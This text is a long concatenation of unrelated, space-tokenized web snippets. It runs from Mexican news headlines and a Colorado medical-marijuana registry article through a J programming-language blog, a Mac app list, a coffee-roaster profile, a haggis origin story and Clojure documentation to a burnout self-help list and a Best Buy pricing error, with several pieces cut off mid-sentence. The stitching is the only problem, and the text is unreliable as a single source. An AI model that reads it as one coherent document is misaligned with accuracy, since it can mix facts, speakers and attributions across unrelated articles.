Familiares de los custodios de Cieneguillas critican a la CNDH Amagan con marchar desde Zacatecas hasta San Lázaro
Periodista asesinado en Acapulco fue enterrado vivo Acapulco , Gro. 29 de julio .
La autopsia practicada por el Servicio Médico Forense al cuerpo de Juan Daniel Martínez Gil , titular del informativo W Guerrero Noticias , concluyó que murió por asfixia , por lo que pudo haber sido enterrado con vida y haber muerto en las primeras horas de la madrugada del pasado martes .
Continuar
Las fuerzas armadas , escrupulosas en proteger los derechos humanos : Calderón Afirma que la lucha anticrimen ha tenido grandes costos , pero está rindiendo frutos
Convalida Gómez Mont operativo Ciudad Juárez , Chih. , 29 de julio .
Al concluir la evaluación del Operativo Conjunto Chihuahua contra el crimen organizado , el secretario de Gobernación , Fernando Gómez Mont , dijo que “ no es momento de complacencias , pero tampoco de autoderrotarse , el operativo va bien y va a seguir ” .
Continuar
Reconoce la diócesis de Tehuacán la revocación sacerdotal a Nicolás Aguilar La resolución papal sobre el cura pederasta es suprema e inapelable
Efectúan en el Cisen esta semana simulacro de ataque terrorista en el Golfo de México Ejercicio para funcionarios de alto nivel de diversas dependencias
Pide el TEPJF al IFE rehacer su solicitud a La Jornada de entregarle información
Le requería comunicarle las fuentes de una nota difundida el 28 de marzo pasado Aunque su interés sea legítimo , debe respetar el derecho de los medios al secreto profesional
Culpa subsecretario del Trabajo a Gómez Urrutia de 2 años de huelga en Cananea El líder antepone sus intereses personales ; pidió la residencia a Canadá , dice el funcionario Reprochan senadores de PRD y Convergencia que el gobierno se puso en favor de la empresa
Ratifican denuncia contra magistrados por incumplir amparo para frenar mina Rosario Ibarra y González Schmal exigen evitar desastre ecológico
ASPA : paros técnicos contra los despidos La Asociación Sindical de Pilotos Aviadores ( ASPA ) analiza el establecimiento de un esquema similar a un paro técnico , con el objetivo de evitar despidos , por lo que realizará una asamblea para aprobar el plan .
Continuar
Insiste Gordillo en cambiar de vocación a las normales ; niega la venta de plazas
Se están formando maestros para el desempleo , afirma la dirigente magisterial Protestan egresados de varios estados porque no les permitirán competir por una vacante
Pese a la feminización de la matrícula , universitarias sufren inequidad : experta Convocan UNAM y Congreso a foro para impulsar la igualdad
Exigen respeto a los derechos indígenas Organizaciones indígenas de varios estados se manifestaron frente al Senado de la República para exigir a la Comisión Permanente del Congreso la garantía de los derechos indígenas y , en particular , del Derecho de Consulta estipulado en el Convenio 169 de la Organización Internacional del Trabajo ( OIT ) , sin embargo , tras cuatro horas de espera , los legisladores se negaron a recibir a una comitiva de estas organizaciones .
Continuar
Two doctors account for more than a third of the patients on Colorado ’s medical - marijuana registry , and five doctors account for more than 50 percent of the patients , according to statistics from the state health department .
In all , of the 10,000 medical - marijuana patients on the state ’s registry , 75 percent of those received their recommendations from one of only 15 doctors .
The clustering of so many patients on the registry from so few doctors has raised the suspicions of state officials .
“ It ’s a cause for concern , ” said Jim Martin , executive director of the state Department of Public Health and Environment .
“ At least in any other area like this , we would want to be sure that the physicians are meeting the standards of care . ”
State Attorney General John Suthers went a step further , suggesting the state Board of Medical Examiners investigate the top pot-recommending docs .
“ The Health Department can question whether it ’s proper medicine to issue hundreds of certifications in one day and perhaps make some referrals to the medical board , ” Suthers said , referencing a statement by the state ’s chief medical officer during a recent hearing that one doctor signed for 200 patients in a single day .
But cannabis advocates said the clustering is perfectly understandable , the result of doctors who specialize in a particular area .
Medical - marijuana attorney Rob Corry said the doctors are “ compassionate professionals ” whose specialty naturally attracts patients seeking alternative forms of medicine .
“ I ’m very concerned about the climate of fear that the Colorado attorney general has created in the minds of physicians who are just trying to help people , ” Corry said .
Under state confidentiality laws , the names of the top pot-recommending doctors are not released .
But the doctors are almost certainly affiliated with one of a handful of large medical - marijuana referral clinics in the state .
The founder of one such clinic , The Hemp and Cannabis Foundation in Wheat Ridge , said his doctors put patients through a rigorous screening process and have turned away numerous patients who are not qualified .
“ A lot of doctors do n’t know anything about medical marijuana , ” said Paul Stanford , the Portland , Ore. - based founder of the clinic , which has offices in eight states .
Under Colorado law , patients can receive medical marijuana only for a “ debilitating medical condition , ” such as cancer or severe nausea .
The greatest number of patients are on the registry for chronic pain .
Stanford said the recommendation process at his clinic starts by pre-screening patients in phone calls and ensuring they have medical documentation of their ailments .
After that , an appointment is made and the clinic ’s doctor or other staff members spend a couple hours examining and counseling the patient .
But Stanford acknowledges other clinics might not hold as high a standard .
Several clinics that advertise in the local alternative magazine Westword tout “ no prior medical history needed ” policies .
Others are connected to marijuana dispensaries , linking the diagnosis of a problem with the sale of a cure .
Suthers said the legal language of Amendment 20 — the voter - approved initiative that legalized medical marijuana — ultimately restricts how much he or any other official can address the concerns .
“ There ’s not much that can be done about it , ” he said .
“ And frankly I think it ’s all by design . ”
John Ingold : 303-954-1068 or jingold@denverpost.com
Related news
Dispensaries crop up on W. Slope
ASPEN — The medical - marijuana business is growing on the Western Slope .
Aspen saw its first two dispensaries open in less than a week .
A former dentist ’s office is the new home of Aspen L.E.A.F. , which stands for Locals Emporium of Alternative Farms .
That dispensary opened for appointments on Monday .
The next day , Cooper Street Apothecary opened for business .
New dispensaries have also opened this summer in Basalt , Carbondale and Edwards .
The town of Avon received its first application for a dispensary business license this month .
Colorado voters approved the dispensaries in 2000 , but in the first few years of the medical - marijuana law most dispensaries were located along the Front Range .
The Associated Press
But in the Epic poem the absurdity passes unnoticed .
For if absurdity be the subject of laughter , doubt you not but great boldness is seldom without some absurdity .
" I am temperate to the verge of absurdity , " replied the Tramp .
To the former her raillery was probably , as far as it regarded only himself , perfectly indifferent ; but to the latter it was at first incomprehensible ; and when its object was understood , she hardly knew whether most to laugh at its absurdity , or censure its impertinence , for she considered it as an unfeeling reflection on the colonel 's advanced years , and on his forlorn condition as an old bachelor .
Poets , of course , may be satisfactorily read in volumes of , selections ; but to me , at least , a book of brief extracts from twenty or a hundred prose authors is an absurdity .
Perhaps I may venture to add that personally I find it advisable to pass hastily over the seventeenth and eighteenth centuries and so gain as much time as possible for the nineteenth .
" Then , " suggested the idea , with a blush for its own absurdity , " why not go on pilgrimage and seek her ?
Judges and starters have been conveniently blind to this absurdity , but the public demonstration off St .
And now that the providential occurrence was apparently close at hand , it would have been sheer absurdity to think that the supply would be short of the need : as absurd as a faith that believed in half a miracle for want of strength to believe in a whole one .
An officer formerly attached to a king 's household , whose business it was to amuse the court by ludicrous actions and utterances , the absurdity being attested by his motley costume .
Or what greater absurdity can there be than putting before us an old man as a swashbuckler , a young man as a poltroon , a lackey using fine language , a page giving sage advice , a king plying as a porter , a princess who is a kitchen - maid ?
Now to say that the honour I here mean , and which was , I thought , all the honour I could be supposed to mean , will uphold , much less dictate an untruth , is to assert an absurdity too shocking to be conceived . "
The World 's Most Mind - Bending Language Has the Best Development Environment
I highly recommend that all programmers learn J. I doubt most will end up using it for daily work , but the process of learning it will stick with you .
J is so completely different from everything else out there , and all your knowledge of C++ and Python and Scheme goes right out the window , leaving you an abject , confused beginner .
In short , J will make you cry .
But that 's not what I want to talk about .
Though it 's a bizarre and fringe language ( yet not one of those programmer attempts at high humor ) , J is the most beautiful and useful development system I 've come across .
I 'm not talking about the language itself , but the standard environment and add - ons that come with the language .
The IDE is more akin to Python 's IDLE than monstrosities which may come to mind .
There 's a window for entering commands and seeing the results , and you can open up separate , syntax - colored editor windows , running the contents of each with a keypress .
It 's nothing groundbreaking , but it 's something that most languages do n't provide .
And in the spirit of IDLE , J's IDE is written in J .
( I 'll interject that J is cross- platform for Windows , OS X , and Linux , including 64 - bit support , just in case anyone is preparing to deride it as Windows - only . )
Then there are the standard libraries : 3D graphics via OpenGL ; full GUI support including an interface builder ; memory - mapped files ; performance profiling tools ; a full interface to arbitrary DLLs ; regular - expressions ; sockets .
Again , nothing tremendously unusual , except maybe memory - mapped files and the DLL hooks , but having it all right there and well - documented is a big win .
Beginner questions like " What windowing library should I use ? " just do n't get asked .
The first really interesting improvements over most languages are the visualization tools .
It 's one line of code to graph arbitrary data .
Think about that : no need to use a graphing calculator , no need to export to some separate tool , and most importantly the presence of such easy graphing ability means that you will use it .
Once you get started running all kinds of data through visualization tools , you 'll find you use them to spot - check for errors or to get a better understanding of what kinds of input you 're dealing with .
It goes further than just 2D graphs .
For example , there 's a nifty tool that color codes elements of a table , where identical elements have the same colors .
It makes patterns obvious .
( Color code a matrix , and you can easily tell if all the elements on a diagonal are the same . )
What makes me happiest is the built - in tutorial system , called " Labs " in J lingo .
It 's a mix of explanatory text , expressions which are automatically evaluated so you can see the results , and pauses after each small bit of exposition so you can experiment in the live J environment .
Labs can be broken into chapters ( so you can work through them in parts ) , and the tool for creating your own labs is part of the standard J download .
While many of the supplied labs are along the lines of " How to use sockets , " the best ones are n't about J at all .
They 're about geometry or statistics or image processing , and you end up learning J while exploring those topics .
J co-creator Ken Iverson 's labs are the most striking , because they forgo the usual pedantic nature of language tutorials and come across as downright casual .
Every " Learn Haskell " tutorial I 've read wallows in type systems and currying and all the trappings of the language itself .
And after a while it all gets to be too much , and I lose interest .
Iverson just goes along talking about some interesting number theory , tosses out some short executable expressions to illustrate his points , and drops in a key bit of J terminology almost as an afterthought .
If you 're wondering why I love the J environment so much but do n't use it as my primary programming language , that 's because , to me , J is n't suited for most projects I 'm interested in .
But for exploration and learning there 's no finer system .
( If you want to see some real J code , try Functional Programming Archaeology . )
permalink August 24 , 2009
previously
Mike Jenkins was a rookie during one of the most disappointing letdowns in Dallas Cowboys ‘ history .
In an interview with The Landry Hat , he admits that he really did n’t know if any one person , any one thing , was causing the Cowboys to implode in a year they were predicted to win a record - setting sixth Super Bowl .
Instead , the Pittsburgh Steeler did it .
Jenkins was n’t too blame for the disaster this past season .
But one thing that he said that struck me was that the Dallas Cowboys were playing as individuals , not as a team .
That ’s a valuable lesson a rookie could have learned from the 2008 Dallas Cowboys .
Here ’s the entire interview with Mike Jenkins .
[ display_podcast ]
Also , check out Jenkins blog here .
Hat tip to PlayerPress
and Cat Crave
.........................................................................................................................................................................................................
palmares | a funny guy | the stolen vuelta | honour | a peiper 's tale | the spanish years |
the small yin | setting the record straight | millar on motorbikes | the book |
robert millar colnago c40 review | 1988 winning magazine interview | training | the outsider |
2008 interview | british road champion | the 2011 tour de France
.........................................................................................................................................................................................................
robert on bradley
the following interview was first published in the observer newspaper on sunday 26th july 2009 , the very day the tour de france finished on the champs elysees in paris with britain 's bradley wiggins in fourth place overall .
since this equals robert 's fourth place in the 1984 tour , william fotheringham asked robert for his views on wiggins ' performance .
due to the nature of print publications , robert 's answers were slightly edited , presumably due to space restrictions .
happily , thewashingmachinepost has no such space restrictions , so with the permission of both mr millar and mr fotheringham ( to whom i am extremely grateful ) , i reproduce the interview in full .
Before the Tour , would you have thought your British record of 4th place overall would be threatened by Wiggins ?
No , not at all .
Bradley had been a talented track rider , but the teams he had been with up until now had n't helped him realise that he might have career on the road too .
Maybe he did n't realise that either .
Are you surprised by what he 's done ?
( did you think he had this in him ? )
After having used a Mac , there seems to be no better option for the working web designer .
Aside from its slim body , bright LCD , and streamlined operating system , the programs are designed to work on that specific machine running that specific system , making them quite stable .
If you , like many users , however , find software on a Mac to be too expensive , and you 're looking for free alternatives to do your web design work , below are fifteen handy options .
1 ) Audacity
For those times you need to add advertisements , alter length , reduce size , merge effects , or any other audio - related work , the free app Audacity will make the task simple .
2 ) GIMP
By now , if you have n't heard of GIMP , then you 've been living under a rock .
This free program ( requiring X11 ) allows designers to author ( or alter , as the case may be ) graphics , whether its an overall site design , a logo , or a banner .
If you are n't running X11 , then download Seashore instead .
3 ) Cyberduck
Cyberduck , for all your FTP needs !
Sorry , could n't help myself .
This nifty little app is open source and the ideal program for anything FTP , SFTP , WebDav , and more .
Aside from its awesome file browser , the many integrated editors it has allows users to easily alter and edit information without hassle .
4 ) Nvu
For those times you just want to get done , the project is small , the priority is low , and , as always , your time is too precious to waste .
Nvu is a free WYSIWYG ( what you see is what you get ) app like Frontpage and Dreamweaver .
5 ) Smultron
A nice plus about this app is that it works alongside the above - listed Cyberduck program .
Smultron is a text editor , only more so , as it boasts tabs for multiple documents , as well as the always - welcomed varied text colors when programming .
6 ) Freemind
Before you can get down to the fun part -- writing , creating , and ultimately publishing , the webpage -- you have to design it .
Of course , good customers make this process much easier , but still , its not always fun to figure out the optimal design , and that 's where Freemind comes in .
You can use this program to connect , organize , and pattern your thoughts and ideas as they come , organizing them with the expanse of tools available .
7 ) Sunrise Browser
The Sunrise Browser was created specifically with web designers in mind , and offers features that may find useful , a few of which are : the ability to highlight and right - click text and perform a search using a user - specified engine , the ability to open web page source in a user - specified text editor , and snapshot entire web pages to save in GIF , JPG , PNG , or even highest - quality TIFF formats .
8 ) Blender
Blender is a powerful 3D model and animation program .
Free , and with quite a following , this program can be used to create short animations , or to model 3D objects that be either be mapped en program , or with different rendering software .
9 ) CC Publisher
If , in the process of creation , you make something that you decide would best fit into the Creative Commons world , CC Publisher makes it simple to add your content ( graphics , audio , video ) to the online library for all to access .
10 ) xChat Aqua
For those times you need to do some last minute collaboration with your client , associate , or maybe just waste time , xChat Aqua is a ' powerful ' IRC application that allows you to hold multiple chat sessions all organized into a neat series of tabs .
11 ) Multialarm
You 're not doing all your work just to have it lost / edited / corrupted when your kid brother decides to toy around in your machine .
To keep your system ( and thusly , your data ) safe , Multialarm will basically put a sound system alarm on your computer to shrill whenever someone uses it unauthorized .
12 ) YourSQL
Whether you 're a beginner or an advanced user , the quality app YourSQL will allow you to mange your SQL database with ease .
Features include the ability to fully adjust the interface to your needs , an import / export feature , UTF +8 support , and much ( much ) more .
13 ) ffMPEGx
Its always nice to have a video transcoder on hand , for those times you need to make put up a Flash video but only find MPG's on your hard drive .
ffMPEGx is free , simple to use , and did we mention , free ?
14 ) Inkscape
GIMP is an excellent program , but its definitely not a vector editor / creator .
Inkscape is a free program very similar to Xara and Illustrator , making it inexpensive for web designers to create icons , banners , or other vector related graphics .
15 ) Q Emulator
As sad as it may be , sometimes you just find the perfect app on Windows and no equivalent on Mac .
When that happens , Q Emulator allows you to run those apps at ( almost ) fullspeed .
Written
Auto Completion has become one of the coolest user interaction element in websites lately and most of the famous sites from google , youtube to msn have auto completion based search boxes .
so this time i’ve Collected 20 +
Ready to Use Auto Completion Scripts vary from CSS , Ajax based , mootools and jQuery with cool Animation .
which you can easily incorporate into your future designs .
Hope you like the collection
… So it ’s perfectly okay to mine for uranium near the Grand Canyon as the earth has already survived most of that time without environmental laws .
Ahem .
Really ?
So without further ado , meet Republican state senator Sylvia Allen of Snowflake , Arizona — emphasis on the flake , I think .
And the remark was so offhanded , as if Allen were describing the way the sun comes up every morning … twice .
Perhaps she and Sherri Shepard should form a club .
Post by ILO on 07/06/09 at 9:34 pm
Kevin Ashtari learned a couple things in the U.S. Navy : how to replace the explosives under the ejection seat of an EA - 6B Prowler and how to roast a perfect batch of coffee beans on a gas - powered barbecue grill .
In 2001 , Ashtari , a Naperville native , was an ejection - seat technician stationed on Whidbey Island in Puget Sound .
Until then his taste for coffee had been limited to Starbucks , Dunkin ' Donuts , and navy swill — which is to say , he did n't have much taste for it at all .
But 30 miles south of Seattle , at Victrola Coffee Roasters — off - duty , of course — he had his first sip of joe brewed from freshly roasted beans .
" It was just an epiphany , " he says .
" One of those enlightening moments .
Chocolatey and crisp and smooth all at the same time .
It was n't long at all before I said , ' Oh man , I have to do this . ' "
He mail - ordered some green coffee beans and in the backyard of his house on the base tricked out a triple - burner grill with a high - speed rotisserie motor and a one - gallon stainless - steel drum .
" It was probably six to eight months of just screwing everything up , " he says .
" A lot of coffee burnt and ruined . "
But eventually he got the hang of producing consistently even roasts , devoid of the lighter - colored " gingers , " rogue beans that refuse to roast and will ruin a cup of java .
He upgraded to a ten - gallon drum and began selling beans to friends , neighbors , and superiors .
" The chiefs were tripping on it , " he says .
" The officers were big coffee fiends .
Navy coffee 's pretty crappy , usually . "
In 2003 he was transferred to a base in Rota , on the southwestern coast of Spain .
Beans were a little slower coming in the mail , and the hotter temperatures had him turning down the flame on the grill .
Something else happened too — he and his wife , Corrine , fell in love with a pace that was easygoing , even on base .
Blame the siesta : " It was a different navy at that station , just because it was in Spain , " he says .
" It was a totally different mentality .
There would be a lot of days where stuff could just wait .
We 'd do our little daily inspection and we'd be out of there by noon .
Other bases you'd be working all the time .
The fact that the whole town shut down at two o'clock sort of rubbed off on the base . "
Passing through San Francisco in 2005 , Ashtari had his second epiphany : he took the opportunity to queue up for a cup at the Blue Bottle Coffee Company , famous for its $ 20,000 Japanese siphon bar , a coffeemaker that according to owner James Freeman in the New York Times makes a " sweeter , juicier " coffee with " kaleidoscopic " flavor and sometimes " a texture so light it 's almost moussey . "
Most of the time , though , baristas at Blue Bottle prepare regular drip coffee manually in porcelain strainers lined with unbleached filters , grinding beans for each order , pouring hot water over them , and stirring until a perfectly extracted cup fills up below .
Manual drip is probably most primitive and inconvenient way to make a cup of coffee , but because it allows absolute control over water temperature , proportion , and extraction , in the right hands , it can be dangerously good .
" I was standing in line for like 20 minutes , " says Ashtari , apparently not completely transformed by his relaxed assignment in Spain .
" I was kind of pissed off , I guess .
But it was worth it .
The body that it creates and the clarity of the cup — that 's the only way to get them . "
Ashtari was discharged in 2006 .
He and Corinne shipped back to Seattle , where he bummed around for a few months trying to figure out what to do with himself .
He just needed one more epiphany .
It would come that summer , when they moved to Chicago and he took a tour of Intelligentsia 's Roasting Works on Fulton Street .
Instead of being cowed by the scale of the operation , he was energized .
" I really did n't understand how a roastery works , " he says .
" It was really inspiring to see it .
I was like , yeah , I can do this . "
Ashtari took three semesters ' worth of business classes at UIC and then dropped out to start the Asado Coffee Company , opening the doors to his 15 - seat Lakeview cafe in January .
In addition to espresso , cortado , cafe con leche , and iced coffee , Ashtari sells hot , made - to - order manual - drip coffee in just one size : 12 ounces .
" That 's all you need , " he recently tweeted .
Every step he takes to get it from raw green beans into that cup is small - scale , lovingly methodical , and hands - on .
He invested in a custom - built 12 - kilo roaster from the U.S. Roaster Corporation that takes up one corner of the space .
" I was looking for a manual roaster without a computer , " he says .
Every day or two he roasts a new , small batch of Ugandan Bugisu beans , which he buys from the direct - trade co-op Crop to Cup .
None of the roasted beans he sells in the cafe — or at the Downers Grove farmers ' market on Saturdays — are more than two days old .
Most times they 're not more than a day old .
While the beans are tumbling in the drum , Ashtari makes coffee .
For each order of drip , he grinds half a cup of beans somewhere between fine and coarse .
He then wets an unbleached , conical Melitta filter , to wash away any potential paper taste that could pollute the coffee .
He inserts the filter into a porcelain dripper , set on a rack above a cup , then pours in the coffee and a dollop of hot water , just under the boiling point .
Grounds bloom up in the filter and he stirs , slowly adding more water , still stirring and scraping the grounds down from the side of the filter .
In about two minutes he 's made a bright , full - bodied , perfect cup of coffee , without a trace of bitterness .
The Perfect Cup at Asado Coffee Company from mike sula on Vimeo .
Using this method , Ashtari only gets about seven cups out of each pound of beans , and though he charges two bucks a pop , the only reason he makes any money is that he 's roasting his own .
" That 's not as high of a margin as the typical coffee industry likes to see , " he says .
" But it 's all about that cup for us . "
So what 's a president to do when the promises he made about his economic stimulus program fail to materialize ?
If you 're Barack Obama , you redefine your goals and act as if America wo n't remember what you said originally .
That 's a neat trick if you can get away with it , but Mr. Obama wo n't .
His words are a matter of public record and he will be held to them .
When it came to the stimulus package , the president and his administration promised , in the words of National Economic Director Larry Summers , " You 'll see the effects ...
Catherine Brown says the first Scottish references to haggis came in 1747 A haggis recipe was published in an English book almost two hundred years before any evidence of the dish in Scotland , a historian has claimed .
Historian Catherine Brown said she found references to the dish inside a 1615 book called The English Hus -Wife .
The title would pre-date Robert Burns ' poem To A Haggis , which brought fame to the delicacy , by at least 171 years .
But former world champion haggis maker Robert Patrick insisted : " Nobody 's going to believe it . "
' Popular in England '
Ms Brown said the book by Gervase Markham indicated haggis was first eaten in England and subsequently popularised by the Scots .
The first mention she could find of Scottish haggis was in 1747 .
Anything that 's to do with Scotland , everybody wants to get a part of
Robert Patrick
Haggis maker
Ms Brown told the BBC the author made it quite clear haggis was enjoyed by everyone , not just Scots .
She said : " It was popular in England until the middle of the 18th Century .
Whatever happened in that period , the English decided they did n't like it and the Scots decided they did .
" We had Robert Burns come along who saw in it a very practical dish using up the odds and ends and making something good out of them .
" Obviously the English turned up their noses at it and ate their roast beef , and the Scots for 350 years have been making it their own . "
Her findings are due to be broadcast in a documentary on STV in Scotland .
' Scottish product '
Mr Patrick said the idea haggis originated in England was akin to claims by the Dutch and Chinese to have invented golf .
He added : " Anything that 's to do with Scotland , everybody wants to get a part of .
FROM BBC WORLD SERVICE Please turn on JavaScript .
Media requires JavaScript to play .
More from BBC World Service " We 've nurtured the thing for all these years , we 've developed it , so I think very much it is a Scottish product .
" It 's one of the mainstays of my business 's economy so we 'd never give it up . "
James Macsween , whose Edinburgh - based company makes haggis , said it would remain a Scottish icon whatever its origin .
He said even if the haggis was eaten in England long before Burns made it famous , Scotland had done a better job of looking after it .
And he added : " I did n't hear of Shakespeare writing a poem about it . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Transient data structures are always created from an existing persistent Clojure data structure .
As of Clojure 1.1.0 , vectors , hash - maps , and hash - sets are supported .
Note that not all Clojure data structures can support this feature , but most will .
Lists will not , as there is no benefit to be had .
You obtain a transient ' copy ' of a data structure by calling transient .
This creates a new transient data structure that is a copy of the source , and has the same performance characteristics .
In fact , it mostly is the source data structure , and highlights the first feature of transients - creating one is O ( 1 ) .
It shares structure with its source , just as persistent copies share structure .
The second feature of transients is that creating one does not modify the source , and the source cannot be modified via use of the transient .
Your source data is immutable and persistent as always .
Transients support the read - only interface of the source , i.e. you can call nth , get , count and fn-call a transient vector , just like a persistent vector .
Transients do not support the persistent interface of the source data structure .
assoc , conj etc will all throw exceptions , because transients are not persistent .
Thus you cannot accidentally leak a transient into a context requiring a persistent .
Transients support a parallel set of ' changing ' operations , with similar names followed by ! - assoc ! , conj ! etc .
These do the same things as their persistent counterparts except the return values are themselves transient .
Note in particular that transients are not designed to be bashed in - place .
You must capture and use the return value in the next call .
In this way , they support the same code structure as the functional persistent code they replace .
As the example will show , this will allow you to easily enhance the performance of a piece of code without structural change .
Barney : Fed audit bill will pass in October
House Financial Services Chairman Barney Frank ( D - Mass . ) says he 's negotiating with Rep. Ron Paul ( R - Tx. ) to create mandatory audits of the Federal Reserve -- and that some kind of audit bill will pass the House in October as part of a bigger financial overhaul package .
Frank , who supports Ben Bernanke 's re-appointment as Fed chairman , is walking a tightrope between supporting the administration and heeding the broad , bipartisan support for the Fed audit bill , which has 282 co-sponsors .
After initially backing the Fed 's role as a dominant " systemic regulator , " he now seems leerier of its institutional reach -- and wants to curtail the Fed 's nearly unlimited powers to lend cash -- citing the $ 80 - plus billion loan to AIG .
[ Video ]
" I have been pushing for more openness in the Fed , " Frank told a town hall meeting in Massachusetts earlier this month .
" They will be the major losers of power if I am successful ...
We are going to curtial [ their ] lending power . "
On Paul 's bill :
" We will subject them to a complete audit , " Frank said .
" I 've been working with Ron Paul , whose the main sponsor of that bill .
We do n't want to have the audit appear as if it is influencing monetary policy because that would be inflationary and Ron Paul and i agree on it ...
One of the things the audit will tell us is what the Fed buys and sells -- but not instantly . "
He added : " We will probably have that data released after a time period of several months -- enough time so that would not be market - sensitive .
That will be part of the over federal regulations we are adopting ..
The House will pass it probably in October . "
The Senate , incidentally , has shown little enthusiasm for the Paul bill -- but that could change of its passage lights a populist bonfire .
Glenn
Thrush is senior staff writer at Politico Magazine .
In an appendix to the book I provide a list of 500 invented languages sorted by date .
Why 500 ?
Why not all of them ?
Mostly because any attempt at completeness would be futile , but here is a more involved explanation of my criteria for inclusion in the list .
You can sort this list by author , language name , or date by clicking on the column titles .
Click on the language name to see a sample of the language , an excerpt about it from the book , or other interesting tidbits about the language or its author .
The book excerpts were pasted in from a digital copy of the pre-final - edit manuscript , so they may contain minor errors or infelicitous phrasing .
Just hovering your mouse over the links with a notepad icon next to them also displays a language sample .
Use the menu on the left to see language samples grouped in other ways .
- interesting tidbits - language samples
We often use weight as a metaphor for importance , describing something as a ‘ weighty issue ’ or dismissing an argument as ‘ not holding much weight ’ but a new study suggests that this is not just a figure of speech .
A research team found that they could alter people ’s judgement of importance just by getting them to answer questions using a heavier clipboard .
In a series of short elegant experiments , a research team led by psychologist Nils Jostmann found that people holding a heavy clipboard would , for example , value foreign currencies more highly than those using a lighter clipboard .
Of course , this might be because of the simple association that larger amounts of money weigh more , so they looked at whether more abstract judgements about value could be affected by weight .
Subsequent studies showed that heavier clipboards led to participants placing more importance on the university listening to student opinions , and that participants were more likely to link their opinion of whether Amsterdam was a great city to the competence of the mayor .
A final study found that visitors who were stopped in the street and asked their opinion on a controversial subway were more confident in their opinion and were more likely to agree with strong arguments for the plan .
The researchers link these findings with the growing field of embodied cognition that suggests that much of our experience of the world is actually mediated through how we interact with it .
Much of this research shows that altering the physical condition of the body affects how we perceive and understand , even for concepts that we think are nothing but metaphors .
Link to summary of ‘ Weight as an Embodiment of Importance ’ .
The founders were wary of corporate influence on politics  and their rhetoric sometimes got pretty heated .
In an 1816 letter , Thomas Jefferson declared his hope to “ crush in its birth the aristocracy of our moneyed corporations , which dare already to challenge our government to a trial of strength and bid defiance to the laws of our country . ”
This skepticism was enshrined in law in the early 20th century when the nation adopted strict rules banning corporations from contributing to political campaigns .
Today that ban is in danger from the Supreme Court , which hears arguments next month in a little - noticed case that could open the floodgates to corporate money in politics .
The court has gone to extraordinary lengths to hear the case .
And there are worrying signs that there may well be five votes to rule that the ban on corporate contributions violates the First Amendment .
The origins of the ban lie in the 1896 presidential race , which pitted the Republican William McKinley against William Jennings Bryan , the farm - belt populist .
Bryan was a peerless orator , but McKinley had Mark Hanna  the premier political operative of his day  extracting so - called assessments from the nation ’s biggest corporations and funneling them into a vast marketing campaign .
Striving every day to become better is not an easy job .
It ’s not a joy ride , or a walk in the part .
It ’s hard work .
And hard work wears you out .
If you ’re not balancing this hard work , sooner or later you ’ll hit a wall .
You ’ll reach a state called “ burnout ” .
I know you know the feeling : suddenly , life ’s not nice anymore , everything around you is tasteless and you wonder where are you going anyway .
A burnout is a real danger .
And a hell of a situation to deal with .
Fortunately , this dead end is not totally out of your control .
It may be predicted .
Like a hurricane , it shows some early signs .
And if you know how to read the signs , you can protect yourself .
Here are 7 signs which , in my experience , can witness the proximity of a burnout in your life .
1. You Find Excuses Faster Than Solutions
You have to do something , but out of nowhere comes an excuse .
A really good one .
And you do n’t have to do that thing anymore .
Now is n’t that wonderful ?
You were n’t so into that anyway .
What a relief to find a really good excuse , is n’t it ?
Well , not exactly .
Finding excuses faster than solutions is a sign that you ’re rejecting your reality .
It ’s an early sign of escapism .
If you were n’t be so tired , the idea of an excuse did n’t even cross your mind .
You would just do that thing and move on .
You ’re better than you think you are .
2. Your Favorite Relaxation Is Making You Nauseous
Let ’s say you really enjoy watching soccer .
But you start noticing that watching soccer is not so refreshing anymore .
In fact , it ’s so boring , that you can almost puke on it .
What ’s that game about , anyway ?
Goals ?
To hell with goals , give me something better .
Not being able to recharge yourself is a pretty clear sign that your system is getting overloaded .
Unfortunately , instead of cutting the main power and relax , most of the people are trying to get satisfaction by increasing the relaxation stimulus .
Which overloads the system even more .
3. You Sleep More Than Usual But Worse
That ’s so easy to get spotted , yet so overlooked .
Your sleep is a fantastic indicator of your energy level .
The smaller perturbation in your sleep pattern should be investigated immediately .
Sleeping more but feeling worse is a red arrow pointing for an imminent burn out .
Unfortunately , most of the people are abusing their sleep anyway , so they ca n’t really spot any difference .
And that ’s really sad , because it takes away a fantastic indicator of your health and effort capacity .
Sleeping good is as important as getting things done .
4. Your Rant Tolerance Is Lower Than Usual
You either bully start to engage in fighting , either avoid it even before you know what ’s all about .
Your rant tolerance is a very good indicator of your stress level .
It basically shows how much challenge are your ready to accept in your daily routine .
Although I ’m totally against fighting , accepting rants is almost anytime a fantastic opportunity to learn .
Especially from your critics .
If your rant tolerance is lower , that means you do n’t take criticism too easy .
Time to take a break .
5. You ’d Rather Be Right Than Doing The Right Thing
All you want is to be right about something .
You need that .
Not necessarily doing the right thing but being right about it .
That means you need more confirmation than usual and lack the energy of actually doing stuff .
A burn out will most likely emerge out of this .
The need to be right about stuff is also a sign of low self - confidence .
All those small victories you get from saying : “ I told you so ” are just unconscious pillars you try to put under your falling self - confidence .
Take a break , or the pillars will eventually fall too .
6. A Normal Task Will Require Twice The Time
It ’s not that you ’re tired , but you ’re not focused .
Things you were able to finish in a single run are now done in several blocks .
A thin focus is almost always a sign of an incoming burn out .
Since focus is your reality , a thin one will create a vulnerable reality .
This is also difficult to assess in the first time , because you do n’t always time yourself when doing stuff .
All you get is a feeling of not having enough time , or something like a pressure of having too much on your plate .
Take a break and the time will expand again .
7. You Run Out Of Ideas
That ’s easy to spot but often mistaken for a form of natural dumbness we all have to experience from time to time .
Well , I do n’t think so .
Having a constant flow of ideas is normal for everyone and it ’s a sign of a healthy connectivity .
Ideas are in fact nothing but hints we receive from the Universe .
When you ’re not having ideas , you ’re so disconnected that you ca n’t see the hints anymore .
Do n’t wait until you ’re totally out of sync , take a break , avoid the burn out and reconnect with the idea flow again .
***
Have you ever witnessed some of these ?
Do you have something else to add to that list ?
I would love to hear it in the comments .
Imogen Heap has released the single " Canvas " from her upcoming LP that will be entitled Ellipse and should be released in August .
The track is amazingly beautiful of course and it has a very nice buildup in the beginning .
This is upcoming album is highly anticipated because of the obvious genius that she continuously shows in all her songs .
Check out the track below :
Canvas
Earlier this morning , Best Buy mistakenly listed Samsung 's LN52A650 for just $ 10 .
Not any more .
Some folks ( including me ) bought one at the cheaper price , but update 2 : Best Buy is now sending out canceled order emails .
The product you ordered is no longer available and the order has been
canceled .
If you 'd like to make another selection , visit a Best Buy
store or BestBuy.com .
The credit card ( or Gift Card ) used for this
order has been credited
Advertisement
